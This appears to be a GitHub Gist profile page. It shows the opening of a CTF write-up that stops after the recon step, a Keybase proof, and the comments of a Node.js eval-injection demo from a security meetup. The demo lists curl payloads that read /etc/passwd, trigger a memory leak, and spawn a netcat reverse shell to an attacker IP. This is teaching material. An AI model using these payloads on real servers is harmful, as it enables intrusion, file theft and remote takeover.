Skip to content

Instantly share code, notes, and snippets.

Renato Rodrigues Simpsonpt

Block or report user

Report or block Simpsonpt

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
Simpsonpt /
Last active Mar 20, 2019
H1-702-CTF Write-up.

During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.

The web challenge starts with a simple visit to an endpoint on that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."

Without a shadow of a doubt; I must find a way to interact with that note service.

1 - Recon Phase

As always recon is the first thing to do. I started with the browser. After opening the page, I turned to the network tab on the Developer Tools and went through to the response headers, where I got "Apache/2.4.18 (Ubuntu)".

My first attempt was looking for "/server-status/" since the ([status

Simpsonpt / nodejs-ssjs-nodebleed.js
Created Mar 11, 2016
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise -
View nodejs-ssjs-nodebleed.js
* NodeBleed Original Bug:
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)

Keybase proof

I hereby claim:

  • I am simpsonpt on github.
  • I am simpson ( on keybase.
  • I have a public key whose fingerprint is C709 0843 B313 B823 DD14 7046 52A3 759A 8429 29E4

To claim this, I am signing this object:

You can’t perform that action at this time.